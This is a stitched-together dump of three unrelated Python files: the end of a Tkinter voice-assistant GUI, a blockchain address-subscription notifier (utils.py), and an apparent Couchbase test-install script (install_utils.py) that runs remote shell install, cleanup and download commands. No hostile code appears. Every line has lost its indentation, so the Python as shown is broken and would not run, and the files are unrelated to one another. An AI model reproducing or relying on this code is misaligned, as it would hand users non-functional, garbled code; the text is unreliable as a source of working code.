################################
######## CHAT SCREEN #########
################################
#Chat Frame
chat_frame = Frame(root1, width=380,height=551,bg=chatBgColor)
chat_frame.pack(padx=10)
chat_frame.pack_propagate(0)
bottomFrame1 = Frame(root1, bg='#dfdfdf', height=100)
bottomFrame1.pack(fill=X, side=BOTTOM)
VoiceModeFrame = Frame(bottomFrame1, bg='#dfdfdf')
VoiceModeFrame.pack(fill=BOTH)
TextModeFrame = Frame(bottomFrame1, bg='#dfdfdf')
TextModeFrame.pack(fill=BOTH)
# VoiceModeFrame.pack_forget()
TextModeFrame.pack_forget()
cblLightImg = PhotoImage(file='extrafiles/images/centralButton.png')
cblDarkImg = PhotoImage(file='extrafiles/images/centralButton1.png')
if KCS_IMG==1: cblimage=cblDarkImg
else: cblimage=cblLightImg
cbl = Label(VoiceModeFrame, fg='white', image=cblimage, bg='#dfdfdf')
cbl.pack(pady=17)
AITaskStatusLbl = Label(VoiceModeFrame, text=' Offline', fg='white', bg=AITaskStatusLblBG, font=('montserrat', 16))
AITaskStatusLbl.place(x=140,y=32)
#Settings Button
sphLight = PhotoImage(file = "extrafiles/images/setting.png")
sphLight = sphLight.subsample(2,2)
sphDark = PhotoImage(file = "extrafiles/images/setting1.png")
sphDark = sphDark.subsample(2,2)
if KCS_IMG==1: sphimage=sphDark
else: sphimage=sphLight
settingBtn = Button(VoiceModeFrame,image=sphimage,height=30,width=30, bg='#dfdfdf',borderwidth=0,activebackground="#dfdfdf",command=lambda: raise_frame(root2))
settingBtn.place(relx=1.0, y=30,x=-20, anchor="ne")
#Keyboard Button
kbphLight = PhotoImage(file = "extrafiles/images/keyboard.png")
kbphLight = kbphLight.subsample(2,2)
kbphDark = PhotoImage(file = "extrafiles/images/keyboard1.png")
kbphDark = kbphDark.subsample(2,2)
if KCS_IMG==1: kbphimage=kbphDark
else: kbphimage=kbphLight
kbBtn = Button(VoiceModeFrame,image=kbphimage,height=30,width=30, bg='#dfdfdf',borderwidth=0,activebackground="#dfdfdf", command=changeChatMode)
kbBtn.place(x=25, y=30)
#Mic
micImg = PhotoImage(file = "extrafiles/images/mic.png")
micImg = micImg.subsample(2,2)
micBtn = Button(TextModeFrame,image=micImg,height=30,width=30, bg='#dfdfdf',borderwidth=0,activebackground="#dfdfdf", command=changeChatMode)
micBtn.place(relx=1.0, y=30,x=-20, anchor="ne")
#Text Field
TextFieldImg = PhotoImage(file='extrafiles/images/textField.png')
UserFieldLBL = Label(TextModeFrame, fg='white', image=TextFieldImg, bg='#dfdfdf')
UserFieldLBL.pack(pady=17, side=LEFT, padx=10)
UserField = Entry(TextModeFrame, fg='white', bg='#203647', font=('Montserrat', 16), bd=6, width=22, relief=FLAT)
UserField.place(x=20, y=30)
UserField.insert(0, "Ask me anything...")
UserField.bind('<Return>', keyboardInput)
#User and Bot Icon
userIcon = PhotoImage(file="extrafiles/images/avatars/ChatIcons/a"+str(ownerPhoto)+".png")
botIcon = PhotoImage(file="extrafiles/images/assistant2.png")
botIcon = botIcon.subsample(2,2)
###########################
######## SETTINGS #######
###########################
settingsLbl = Label(root2, text='Settings', font=('Arial Bold', 15), bg=background, fg=textColor)
settingsLbl.pack(pady=10)
separator = ttk.Separator(root2, orient='horizontal')
separator.pack(fill=X)
#User Photo
userProfileImg = Image.open("extrafiles/images/avatars/a"+str(ownerPhoto)+".png")
userProfileImg = ImageTk.PhotoImage(userProfileImg.resize((120, 120)))
userPhoto = Button(root2, image=userProfileImg, bg=background, bd=0, relief=FLAT, activebackground=background, command=SelectAvatar)
userPhoto.pack(pady=(20, 5))
#Change Photo
chngPh = ImageTk.PhotoImage(Image.open("extrafiles/images/avatars/changephoto2.png").resize((120, 120)))
userPhoto.bind('<Enter>', onhover)
userPhoto.bind('<Leave>', onleave)
#Username
userName = Label(root2, text=ownerName, font=('Arial Bold', 15), fg=textColor, bg=background)
userName.pack()
#Settings Frame
settingsFrame = Frame(root2, width=300, height=300, bg=background)
settingsFrame.pack(pady=20)
assLbl = Label(settingsFrame, text='Assistant Voice', font=('Arial', 13), fg=textColor, bg=background)
assLbl.place(x=0, y=20)
n = StringVar()
assVoiceOption = ttk.Combobox(settingsFrame, values=('Female', 'Male'), font=('Arial', 13), width=13, textvariable=n)
assVoiceOption.current(voice_id)
assVoiceOption.place(x=150, y=20)
assVoiceOption.bind('<<ComboboxSelected>>', changeVoice)
voiceRateLbl = Label(settingsFrame, text='Voice Rate', font=('Arial', 13), fg=textColor, bg=background)
voiceRateLbl.place(x=0, y=60)
n2 = StringVar()
voiceOption = ttk.Combobox(settingsFrame, font=('Arial', 13), width=13, textvariable=n2)
voiceOption['values'] = ('Very Low', 'Low', 'Normal', 'Fast', 'Very Fast')
voiceOption.current(ass_voiceRate//50-2) #100 150 200 250 300
voiceOption.place(x=150, y=60)
voiceOption.bind('<<ComboboxSelected>>', changeVoiceRate)
volumeLbl = Label(settingsFrame, text='Volume', font=('Arial', 13), fg=textColor, bg=background)
volumeLbl.place(x=0, y=105)
volumeBar = Scale(settingsFrame, bg=background, fg=textColor, sliderlength=30, length=135, width=16, highlightbackground=background, orient='horizontal', from_=0, to=100, command=changeVolume)
volumeBar.set(int(ass_volume*100))
volumeBar.place(x=150, y=85)
themeLbl = Label(settingsFrame, text='Theme', font=('Arial', 13), fg=textColor, bg=background)
themeLbl.place(x=0,y=143)
themeValue = IntVar()
s = ttk.Style()
s.configure('Wild.TRadiobutton', font=('Arial Bold', 10), background=background, foreground=textColor, focuscolor=s.configure(".")["background"])
darkBtn = ttk.Radiobutton(settingsFrame, text='Dark', value=1, variable=themeValue, style='Wild.TRadiobutton', command=changeTheme, takefocus=False)
darkBtn.place(x=150,y=145)
lightBtn = ttk.Radiobutton(settingsFrame, text='Light', value=2, variable=themeValue, style='Wild.TRadiobutton', command=changeTheme, takefocus=False)
lightBtn.place(x=230,y=145)
themeValue.set(1)
if KCS_IMG==0: themeValue.set(2)
chooseChatLbl = Label(settingsFrame, text='Chat Background', font=('Arial', 13), fg=textColor, bg=background)
chooseChatLbl.place(x=0,y=180)
cimg = PhotoImage(file = "extrafiles/images/colorchooser.png")
cimg = cimg.subsample(3,3)
colorbar = Label(settingsFrame, bd=3, width=18, height=1, bg=chatBgColor)
colorbar.place(x=150, y=180)
if KCS_IMG==0: colorbar['bg'] = '#E8EBEF'
Button(settingsFrame, image=cimg, relief=FLAT, command=getChatColor).place(x=261, y=180)
backBtn = Button(settingsFrame, text=' Back ', bd=0, font=('Arial 12'), fg='white', bg='#14A769', relief=FLAT, command=lambda:raise_frame(root1))
clearFaceBtn = Button(settingsFrame, text=' Clear Facial Data ', bd=0, font=('Arial 12'), fg='white', bg='#14A769', relief=FLAT, command=deleteUserData)
backBtn.place(x=5, y=250)
clearFaceBtn.place(x=120, y=250)
try:
# pass
Thread(target=voiceMedium).start()
except:
pass
try:
# pass
Thread(target=webScrapping.dataUpdate).start()
except Exception as e:
print('System is Offline...')
root.iconbitmap('extrafiles/images/assistant2.ico')
raise_frame(root1)
root.mainloop()
|
utils.py | #!/usr/bin/python3
import json
import threading
import asyncio
import random
import sys
from .constants import *
from rpcutils import errorhandler as rpcErrorHandler, constants as rpcConstants
from wsutils.subscriptionshandler import SubcriptionsHandler
from . import apirpc
from logger import logger
def ensureHash(hashAddr):
if isinstance(hashAddr, str):
if hashAddr.startswith('0x'):
return hashAddr.lower()
else:
return '0x' + hashAddr.lower()
else:
return hashAddr.lower()
def getMethodSchemas(name):
return getRequestMethodSchema(name), getResponseMethodSchema(name)
def getRequestMethodSchema(name):
return RPC_JSON_SCHEMA_FOLDER + name + SCHEMA_CHAR_SEPARATOR + REQUEST + SCHEMA_EXTENSION
def getResponseMethodSchema(name):
return RPC_JSON_SCHEMA_FOLDER + name + SCHEMA_CHAR_SEPARATOR + RESPONSE + SCHEMA_EXTENSION
def getWSMethodSchemas(name):
return getWSRequestMethodSchema(name), getWSResponseMethodSchema(name)
def getWSRequestMethodSchema(name):
return WS_JSON_SCHEMA_FOLDER + name + SCHEMA_CHAR_SEPARATOR + REQUEST + SCHEMA_EXTENSION
def getWSResponseMethodSchema(name):
return WS_JSON_SCHEMA_FOLDER + name + SCHEMA_CHAR_SEPARATOR + RESPONSE + SCHEMA_EXTENSION
def searchAddressesIntoBlock(data):
if not SubcriptionsHandler.coinInAddressSubscription():
logger.printWarning("Coin not available in subscriptions handler")
return
if not SubcriptionsHandler.getSubscriptionsAvailable():
logger.printWarning("There are no addresses subscribed for")
return
reqParsed = None
try:
reqParsed = json.loads(data)
except Exception as e:
logger.printError(f"Payload is not JSON message. Error: {e}")
raise rpcErrorHandler.BadRequestError(f"Payload is not JSON message. Error: {e}")
params = reqParsed[rpcConstants.PARAMS]
blockNumber = params[rpcConstants.RESULT][NUMBER]
logger.printInfo(f"Getting new block to check addresses subscribed for. Block number: {params[rpcConstants.RESULT][NUMBER]}")
block = apirpc.getBlockByNumber(
random.randint(1, sys.maxsize),
{
BLOCK_NUMBER: blockNumber
}
)
for address in SubcriptionsHandler.getSubscriptionsAvailable():
for transaction in block[TRANSACTIONS]:
if address == transaction[FROM] or address == transaction[TO]:
notifyThread = threading.Thread(target=notifyHandler, args=(address,), daemon=True)
notifyThread.start()
def notifyHandler(args):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(notify(args))
loop.close()
async def notify(address):
addressClients = SubcriptionsHandler.getAddressClients(address)
logger.printInfo(f"Getting balance for address subscribed for in new block. Address: {address}")
balance = apirpc.getAddressBalance(
random.randint(1, sys.maxsize),
{
ADDRESS: address
}
)
logger.printInfo("Sending balance to subscribers")
for client in addressClients:
await client.websocket.send_str(
json.dumps(
balance
)
)
|
install_utils.py | import getopt
import re
import subprocess
import sys
import threading
import time
sys.path = [".", "lib"] + sys.path
import testconstants
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
from membase.api.rest_client import RestConnection
import install_constants
import TestInput
import logging.config
import os.path
logging.config.fileConfig("scripts.logging.conf")
log = logging.getLogger()
NodeHelpers = []
# Default params
params = {
"version": None,
"install_tasks": install_constants.DEFAULT_INSTALL_TASKS,
"url": None,
"debug_logs": False,
"cb_edition": install_constants.CB_ENTERPRISE,
"timeout": install_constants.INSTALL_TIMEOUT,
"all_nodes_same_os": False,
"skip_local_download": True,
"storage_mode": "plasma",
"disable_consistency": False,
"enable_ipv6": False,
"use_domain_names": False,
"fts_quota": testconstants.FTS_QUOTA,
"fts_query_limit": 0
}
class build:
def __init__(self, name, url, path, product="cb"):
self.name = name
self.url = url
self.path = path
self.product = product
self.version = params["version"]
class NodeHelper:
def __init__(self, node):
self.node = node
self.ip = node.ip
self.params = params
self.build = None
self.queue = None
self.thread = None
self.rest = None
self.install_success = False
self.connect_ok = False
self.shell = None
self.info = None
self.enable_ipv6 = False
self.check_node_reachable()
self.nonroot = self.shell.nonroot
self.actions_dict = install_constants.NON_ROOT_CMDS if self.nonroot else install_constants.CMDS
def check_node_reachable(self):
start_time = time.time()
# Try 3 times
while time.time() < start_time + 60:
try:
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
self.info = self.shell.extract_remote_info()
self.connect_ok = True
if self.connect_ok:
break
except Exception as e:
log.warning("{0} unreachable, {1}, retrying..".format(self.ip, e))
time.sleep(20)
def get_os(self):
os = self.info.distribution_version.lower()
to_be_replaced = ['\n', ' ', 'gnu/linux']
for _ in to_be_replaced:
if _ in os:
os = os.replace(_, '')
if self.info.deliverable_type == "dmg":
major_version = os.split('.')
os = major_version[0] + '.' + major_version[1]
return os
def uninstall_cb(self):
need_nonroot_relogin = False
if self.shell.nonroot:
self.node.ssh_username = "root"
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
need_nonroot_relogin = True
if self.actions_dict[self.info.deliverable_type]["uninstall"]:
cmd = self.actions_dict[self.info.deliverable_type]["uninstall"]
if "msi" in cmd:
'''WINDOWS UNINSTALL'''
self.shell.terminate_processes(self.info, [s for s in testconstants.WIN_PROCESSES_KILLED])
self.shell.terminate_processes(self.info, \
[s + "-*" for s in testconstants.COUCHBASE_FROM_VERSION_3])
installed_version, _ = self.shell.execute_command(
"cat " + install_constants.DEFAULT_INSTALL_DIR["WINDOWS_SERVER"] + "VERSION.txt")
if len(installed_version) == 1:
installed_msi, _ = self.shell.execute_command(
"cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] + "; ls *" + installed_version[
0] + "*.msi")
if len(installed_msi) == 1:
self.shell.execute_command(
self.actions_dict[self.info.deliverable_type]["uninstall"].replace("installed-msi",
installed_msi[0]))
for browser in install_constants.WIN_BROWSERS:
self.shell.execute_command("taskkill /F /IM " + browser + " /T")
else:
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["uninstall"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.shell.terminate_processes(self.info, install_constants.PROCESSES_TO_TERMINATE)
if need_nonroot_relogin:
self.node.ssh_username = "nonroot"
self.shell = RemoteMachineShellConnection(self.node, exit_on_failure=False)
def pre_install_cb(self):
if self.actions_dict[self.info.deliverable_type]["pre_install"]:
cmd = self.actions_dict[self.info.deliverable_type]["pre_install"]
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["pre_install"]
if cmd is not None and "HDIUTIL_DETACH_ATTACH" in cmd:
start_time = time.time()
while time.time() < start_time + timeout:
try:
ret = hdiutil_attach(self.shell, self.build.path)
if ret:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
def install_cb(self):
self.pre_install_cb()
if self.actions_dict[self.info.deliverable_type]["install"]:
if "suse" in self.get_os():
cmd = self.actions_dict[self.info.deliverable_type]["suse_install"]
else:
cmd = self.actions_dict[self.info.deliverable_type]["install"]
cmd = cmd.replace("buildbinary", self.build.name)
cmd = cmd.replace("buildpath", self.build.path)
cmd = cmd.replace("mountpoint", "/tmp/couchbase-server-" + params["version"])
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["install"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.post_install_cb()
def post_install_cb(self):
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["post_install"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
if self.actions_dict[self.info.deliverable_type]["post_install"]:
cmd = self.actions_dict[self.info.deliverable_type]["post_install"].replace("buildversion", self.build.version)
o, e = self.shell.execute_command(cmd, debug=self.params["debug_logs"])
if o == ['1']:
break
else:
if self.actions_dict[self.info.deliverable_type]["post_install_retry"]:
if self.info.deliverable_type == "msi":
check_if_downgrade, _ = self.shell.execute_command(
"cd " + install_constants.DOWNLOAD_DIR["WINDOWS_SERVER"] +
"; vi +\"set nobomb | set fenc=ascii | x\" install_status.txt; "
"grep 'Adding WIX_DOWNGRADE_DETECTED property' install_status.txt")
print((check_if_downgrade * 10))
else:
self.shell.execute_command(
self.actions_dict[self.info.deliverable_type]["post_install_retry"],
debug=self.params["debug_logs"])
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
def set_cbft_env_options(self, name, value, retries=3):
if self.get_os() in install_constants.LINUX_DISTROS:
while retries > 0:
if self.shell.file_exists("/opt/couchbase/bin/", "couchbase-server"):
ret, _ = self.shell.execute_command(install_constants.CBFT_ENV_OPTIONS[name].format(value))
self.shell.stop_server()
self.shell.start_server()
time.sleep(10)
if ret == ['1']:
log.info("{0} set to {1} on {2}".format(name, value, self.ip))
break
else:
time.sleep(20)
retries -= 1
else:
print_result_and_exit("Unable to set fts_query_limit on {0}".format(self.ip))
def _get_cli_path(self):
if self.nonroot:
if self.get_os() in install_constants.LINUX_DISTROS:
return install_constants.DEFAULT_NONROOT_CLI_PATH["LINUX_DISTROS"]
elif self.get_os() in install_constants.MACOS_VERSIONS:
return install_constants.DEFAULT_NONROOT_CLI_PATH["MACOS_VERSIONS"]
elif self.get_os() in install_constants.WINDOWS_SERVER:
return install_constants.DEFAULT_NONROOT_CLI_PATH["WINDOWS_SERVER"]
else:
if self.get_os() in install_constants.LINUX_DISTROS:
return install_constants.DEFAULT_CLI_PATH["LINUX_DISTROS"]
elif self.get_os() in install_constants.MACOS_VERSIONS:
return install_constants.DEFAULT_CLI_PATH["MACOS_VERSIONS"]
elif self.get_os() in install_constants.WINDOWS_SERVER:
return install_constants.DEFAULT_CLI_PATH["WINDOWS_SERVER"]
def _set_ip_version(self):
if params["enable_ipv6"]:
self.enable_ipv6 = True
if self.node.ip.startswith("["):
hostname = self.node.ip[self.node.ip.find("[") + 1:self.node.ip.find("]")]
else:
hostname = self.node.ip
cmd = install_constants.NODE_INIT["ipv6"].format(self._get_cli_path(),
self.ip,
hostname,
self.node.rest_username,
self.node.rest_password)
else:
cmd = install_constants.NODE_INIT["ipv4"].format(self._get_cli_path(),
self.ip,
self.node.rest_username,
self.node.rest_password)
self.shell.execute_command(cmd)
def pre_init_cb(self):
try:
self._set_ip_version()
if params["fts_query_limit"] > 0:
self.set_cbft_env_options("fts_query_limit", params["fts_query_limit"])
except Exception as e:
log.warning("Exception {0} occurred during pre-init".format(e))
def post_init_cb(self):
# Optionally change node name and restart server
if params.get('use_domain_names', False):
RemoteUtilHelper.use_hostname_for_server_settings(self.node)
# Optionally disable consistency check
if params.get('disable_consistency', False):
self.rest.set_couchdb_option(section='couchdb',
option='consistency_check_ratio',
value='0.0')
def get_services(self):
if not self.node.services:
return ["kv"]
elif self.node.services:
return self.node.services.split(',')
def allocate_memory_quotas(self):
kv_quota = 0
info = self.rest.get_nodes_self()
start_time = time.time()
while time.time() < start_time + 30 and kv_quota == 0:
kv_quota = int(info.mcdMemoryReserved * testconstants.CLUSTER_QUOTA_RATIO)
time.sleep(1)
self.services = self.get_services()
if "index" in self.services:
log.info("Setting INDEX memory quota as {0} MB on {1}".format(testconstants.INDEX_QUOTA, self.ip))
self.rest.set_service_memoryQuota(service='indexMemoryQuota', memoryQuota=testconstants.INDEX_QUOTA)
kv_quota -= testconstants.INDEX_QUOTA
if "fts" in self.services:
log.info("Setting FTS memory quota as {0} MB on {1}".format(params["fts_quota"], self.ip))
self.rest.set_service_memoryQuota(service='ftsMemoryQuota', memoryQuota=params["fts_quota"])
kv_quota -= params["fts_quota"]
if "cbas" in self.services:
log.info("Setting CBAS memory quota as {0} MB on {1}".format(testconstants.CBAS_QUOTA, self.ip))
self.rest.set_service_memoryQuota(service="cbasMemoryQuota", memoryQuota=testconstants.CBAS_QUOTA)
kv_quota -= testconstants.CBAS_QUOTA
if "kv" in self.services:
if kv_quota < testconstants.MIN_KV_QUOTA:
log.warning("KV memory quota is {0}MB but needs to be at least {1}MB on {2}".format(kv_quota,
testconstants.MIN_KV_QUOTA,
self.ip))
kv_quota = testconstants.MIN_KV_QUOTA
log.info("Setting KV memory quota as {0} MB on {1}".format(kv_quota, self.ip))
self.rest.init_cluster_memoryQuota(self.node.rest_username, self.node.rest_password, kv_quota)
def init_cb(self):
duration, event, timeout = install_constants.WAIT_TIMES[self.info.deliverable_type]["init"]
self.wait_for_completion(duration * 2, event)
start_time = time.time()
while time.time() < start_time + timeout:
try:
init_success = False
self.pre_init_cb()
self.rest = RestConnection(self.node)
# Make sure that data_path and index_path are writable by couchbase user
for path in set([_f for _f in [self.node.data_path, self.node.index_path] if _f]):
for cmd in ("rm -rf {0}/*".format(path),
"chown -R couchbase:couchbase {0}".format(path)):
self.shell.execute_command(cmd)
self.rest.set_data_path(data_path=self.node.data_path, index_path=self.node.index_path)
self.allocate_memory_quotas()
self.rest.init_node_services(hostname=None,
username=self.node.rest_username,
password=self.node.rest_password,
services=self.get_services())
if "index" in self.get_services():
self.rest.set_indexer_storage_mode(storageMode=params["storage_mode"])
self.rest.init_cluster(username=self.node.rest_username,
password=self.node.rest_password)
init_success = True
if init_success:
break
self.wait_for_completion(duration, event)
except Exception as e:
log.warning("Exception {0} occurred on {1}, retrying..".format(e, self.ip))
self.wait_for_completion(duration, event)
self.post_init_cb()
def wait_for_completion(self, duration, event):
if params["debug_logs"]:
log.info(event.format(duration, self.ip))
time.sleep(duration)
def cleanup_cb(self):
cmd = self.actions_dict[self.info.deliverable_type]["cleanup"]
if cmd:
try:
# Delete all but the most recently accessed build binaries
self.shell.execute_command(cmd, debug=self.params["debug_logs"])
except:
#ok to ignore
pass
def _get_mounted_volumes(shell):
volumes, _ = shell.execute_command("ls /tmp | grep '{0}'".format("couchbase-server-"))
return volumes
def hdiutil_attach(shell, dmg_path):
volumes = _get_mounted_volumes(shell)
for volume in volumes:
shell.execute_command("hdiutil detach " + '"' + "/tmp/" + volume + '"')
shell.execute_command("umount " + '"' + "/tmp/" + volume + '"')
shell.execute_command("hdiutil attach {0} -mountpoint /tmp/{1}".
format(dmg_path, "couchbase-server-" + params["version"]))
return shell.file_exists("/tmp/", "couchbase-server-" + params["version"])
def get_node_helper(ip):
for node_helper in NodeHelpers:
if node_helper.ip == ip:
return node_helper
return None
def print_result_and_exit(err=None):
if err:
log.error(err)
success = []
fail = []
for server in params["servers"]:
node = get_node_helper(server.ip)
if not node or not node.install_success:
fail.append(server.ip)
elif node.install_success:
success.append(server.ip)
log.info("-" * 100)
for _ in fail:
log.error("INSTALL FAILED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in success:
log.info("INSTALL COMPLETED ON: \t{0}".format(_))
log.info("-" * 100)
if len(fail) > 0:
sys.exit(1)
def process_user_input():
params = _parse_user_input()
_params_validation()
return params
def _parse_user_input():
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'hi:p:', [])
for o, a in opts:
if o == "-h":
print_result_and_exit(install_constants.USAGE)
if len(sys.argv) <= 1:
print_result_and_exit(install_constants.USAGE)
userinput = TestInput.TestInputParser.get_test_input(sys.argv)
except IndexError:
print_result_and_exit(install_constants.USAGE)
except getopt.GetoptError as err:
print_result_and_exit(str(err))
# Mandatory params
if not userinput.servers:
print_result_and_exit("No servers specified. Please use the -i parameter." + "\n" + install_constants.USAGE)
else:
params["servers"] = userinput.servers
# Validate and extract remaining params
for key, value in list(userinput.test_params.items()):
if key == "debug_logs":
params["debug_logs"] = True if value.lower() == "true" else False
if key == "install_tasks":
tasks = []
for task in value.split('-'):
if task in install_constants.DEFAULT_INSTALL_TASKS and task not in tasks:
tasks.append(task)
if len(tasks) > 0:
params["install_tasks"] = tasks
log.info("INSTALL TASKS: {0}".format(params["install_tasks"]))
if "install" not in params["install_tasks"] and "init" not in params["install_tasks"]:
return params # No other parameters needed
if key == 'v' or key == "version":
if re.match('^[0-9\.\-]*$', value) and len(value) > 5:
params["version"] = value
if key == "url":
if value.startswith("http"):
params["url"] = value
else:
log.warning('URL:{0} is not valid, will use version to locate build'.format(value))
if key == "type" or key == "edition" and value.lower() in install_constants.CB_EDITIONS:
params["cb_edition"] = value.lower()
if key == "timeout" and int(value) > 60:
params["timeout"] = int(value)
if key == "storage_mode":
params["storage_mode"] = value
if key == "disable_consistency":
params["disable_consistency"] = True if value.lower() == "true" else False
if key == "skip_local_download":
params["skip_local_download"] = False if value.lower() == "false" else True
if key == "enable_ipv6":
if value.lower() == "true":
for server in params["servers"]:
if re.match('\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', server.ip):
print_result_and_exit(
"Cannot enable IPv6 on an IPv4 machine: {0}. Please run without enable_ipv6=True.".format(
server.ip))
params["enable_ipv6"] = True
if key == "fts_quota" and int(value) >= 256:
params["fts_quota"] = int(value)
if key == "fts_query_limit" and int(value) > 0:
params["fts_query_limit"] = int(value)
if not params["version"] and not params["url"]:
print_result_and_exit("Need valid build version or url to proceed")
return params
def __check_servers_reachable():
reachable = []
unreachable = []
for server in params["servers"]:
try:
RemoteMachineShellConnection(server, exit_on_failure=False)
reachable.append(server.ip)
except Exception as e:
log.error(e)
unreachable.append(server.ip)
if len(unreachable) > 0:
log.info("-" * 100)
for _ in unreachable:
log.error("INSTALL FAILED ON: \t{0}".format(_))
log.info("-" * 100)
for _ in reachable:
# Marking this node as "completed" so it is not moved to failedInstall state
log.info("INSTALL COMPLETED ON: \t{0}".format(_))
log.info("-" * 100)
sys.exit(1)
def _params_validation():
__check_servers_reachable()
# Create 1 NodeHelper instance per VM
for server in params["servers"]:
NodeHelpers.append(NodeHelper(server))
# Version compatibility
node_os = []
for node in NodeHelpers:
if node.get_os() not in install_constants.SUPPORTED_OS:
print_result_and_exit("Install on {0} OS is not supported".format(node.get_os()))
else:
node_os.append(node.get_os())
if len(set(node_os)) == 1:
params["all_nodes_same_os"] = True
_check_version_compatibility(NodeHelpers[0])
else:
for node in NodeHelpers:
_check_version_compatibility(node)
# TODO: check if cb version is compatible with os
def _check_version_compatibility(node):
pass
def pre_install_steps():
if "install" in params["install_tasks"]:
if params["url"] is not None:
if NodeHelpers[0].shell.is_url_live(params["url"]):
params["all_nodes_same_os"] = True
for node in NodeHelpers:
build_binary = __get_build_binary_name(node)
build_url = params["url"]
filepath = __get_download_dir(node) + build_binary
node.build = build(build_binary, build_url, filepath)
else:
print_result_and_exit("URL {0} is not live. Exiting.".format(params["url"]))
else:
for node in NodeHelpers:
build_binary = __get_build_binary_name(node)
build_url = __get_build_url(node, build_binary)
if not build_url:
print_result_and_exit(
"Build is not present in latestbuilds or release repos, please check {0}".format(build_binary))
filepath = __get_download_dir(node) + build_binary
node.build = build(build_binary, build_url, filepath)
_download_build()
def _execute_local(command, timeout):
# -- Uncomment the below 2 lines for python 3
# process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True).wait(timeout)
# process.communicate()[0].strip()
# -- python 2
process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True).wait()
def __copy_thread(src_path, dest_path, node):
logging.info("Copying %s to %s" % (src_path, node.ip))
node.shell.copy_file_local_to_remote(src_path, dest_path)
logging.info("Done copying build to %s.", node.ip)
def _copy_to_nodes(src_path, dest_path):
copy_threads = []
for node in NodeHelpers:
copy_to_node = threading.Thread(target=__copy_thread, args=(src_path, dest_path, node))
copy_threads.append(copy_to_node)
copy_to_node.start()
for thread in copy_threads:
thread.join()
def __get_build_url(node, build_binary):
if params["enable_ipv6"]:
ipv6_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_FQDN_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
if node.shell.is_url_live(ipv6_url, exit_if_not_live=False):
return ipv6_url
else:
latestbuilds_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
release_url = "{0}{1}/{2}/{3}".format(
testconstants.CB_RELEASE_REPO,
testconstants.CB_VERSION_NAME[(params["version"]).split('-')[0][:-2]],
params["version"].split('-')[1],
build_binary)
if node.shell.is_url_live(latestbuilds_url, exit_if_not_live=False):
return latestbuilds_url
elif node.shell.is_url_live(release_url, exit_if_not_live=False):
return release_url
return None
def _download_build():
if params["all_nodes_same_os"] and not params["skip_local_download"]:
check_and_retry_download_binary_local(NodeHelpers[0])
_copy_to_nodes(NodeHelpers[0].build.path, NodeHelpers[0].build.path)
else:
for node in NodeHelpers:
build_url = node.build.url
filepath = node.build.path
cmd = install_constants.DOWNLOAD_CMD[node.info.deliverable_type]
if "curl" in cmd:
cmd = cmd.format(build_url, filepath,
install_constants.WAIT_TIMES[node.info.deliverable_type]
["download_binary"])
elif "wget" in cmd:
cmd = cmd.format(__get_download_dir(node), build_url)
logging.info("Downloading build binary to {0}:{1}..".format(node.ip, filepath))
check_and_retry_download_binary(cmd, node)
log.debug("Done downloading build binary")
def check_and_retry_download_binary_local(node):
log.info("Downloading build binary to {0}..".format(node.build.path))
duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type][
"download_binary"]
cmd = install_constants.WGET_CMD.format(__get_download_dir(node), node.build.url)
start_time = time.time()
while time.time() < start_time + timeout:
try:
_execute_local(cmd, timeout)
if os.path.exists(node.build.path):
break
time.sleep(duration)
except Exception as e:
log.warn("Unable to download build: {0}, retrying..".format(e.message))
time.sleep(duration)
else:
print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout,
node.build.path))
def check_file_exists(node, filepath):
output, _ = node.shell.execute_command("ls -lh {0}".format(filepath), debug=params["debug_logs"])
for line in output:
if line.find('No such file or directory') == -1:
return True
return False
def check_and_retry_download_binary(cmd, node):
duration, event, timeout = install_constants.WAIT_TIMES[node.info.deliverable_type]["download_binary"]
start_time = time.time()
while time.time() < start_time + timeout:
try:
node.shell.execute_command(cmd, debug=params["debug_logs"])
if check_file_exists(node, node.build.path):
break
time.sleep(duration)
except Exception as e:
log.warning("Unable to download build: {0}, retrying..".format(e))
time.sleep(duration)
else:
print_result_and_exit("Unable to download build in {0}s on {1}, exiting".format(timeout, node.ip))
def __get_download_dir(node):
os = node.get_os()
if os in install_constants.LINUX_DISTROS:
if node.shell.nonroot:
return install_constants.NON_ROOT_DOWNLOAD_DIR['LINUX_DISTROS']
else:
return install_constants.DOWNLOAD_DIR["LINUX_DISTROS"]
elif os in install_constants.MACOS_VERSIONS:
return install_constants.DOWNLOAD_DIR["MACOS_VERSIONS"]
